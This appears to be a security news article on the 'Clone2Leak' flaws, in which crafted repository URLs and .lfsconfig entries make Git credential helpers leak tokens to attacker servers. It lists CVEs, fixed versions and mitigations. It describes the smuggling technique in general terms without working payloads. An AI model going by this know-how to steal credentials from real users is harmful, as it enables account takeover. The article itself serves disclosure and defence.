A set of three distinct but related attacks, dubbed ‘Clone2Leak,’ can leak credentials by exploiting how Git and its credential helpers handle authentication requests.
The attack can compromise passwords and access tokens in GitHub Desktop, Git LFS, GitHub CLI/Codespaces, and the Git Credential Manager.
The flaws that make ‘Clone2Leak’ possible were discovered by Japanese researcher RyotaK of GMO Flatt Security, who reported them responsibly to the affected projects.
Security updates addressing all flaws have been made available, and impacted users are urged to ensure they’re running a safe release to mitigate the risk of having their secrets leaked.
Clone2Leak attacks
Each of the flaws discovered by RyotaK revolves around improper parsing of authentication requests made to credential helpers, allowing an attacker to trick Git into leaking stored credentials to a malicious server.
Credential helpers are tools that store and retrieve authentication credentials for when Git interacts with remote repositories, helping avoid repeatedly entering credentials for every Git operation.
Attackers can trick Git into leaking stored credentials when a user clones or interacts with a malicious repository.
Here is an overview of the three ways the Clone2Leak attack can manifest by exploiting various flaws:
- Carriage return smuggling (CVE-2025-23040 and CVE-2024-50338) – GitHub Desktop and Git Credential Manager misinterpret carriage return (\r) characters in URLs. A malicious submodule URL with %0D tricks the credential helper into sending GitHub credentials to an attacker-controlled server instead of the intended host.
- Newline injection (CVE-2024-53263) – Git LFS improperly allows newline (\n) characters in .lfsconfig files, bypassing Git’s security. Attackers can alter credential requests so that Git returns GitHub credentials to a malicious server instead of the correct one.
- Logic flaws in credential retrieval (CVE-2024-53858) – GitHub CLI and GitHub Codespaces had overly permissive credential helpers that sent authentication tokens to unintended hosts. Attackers could steal GitHub access tokens by getting a user to clone a malicious repository inside Codespaces.
All vulnerabilities mentioned above have now been patched, but users should ensure their tools are updated, audit credential configurations, and be cautious when cloning repositories.
The safe versions to upgrade to are GitHub Desktop 3.4.12 or newer, Git Credential Manager 2.6.1 or newer, Git LFS 3.6.1 or later, and gh cli 2.63.0 or later.
Additionally, it is recommended that Git’s ‘credential.protectProtocol’ be enabled as an extra layer of defense against credential smuggling attacks.
Flatt Security’s report does not mention active exploitation in the wild, but with the details now public, the risk of attacks is elevated.
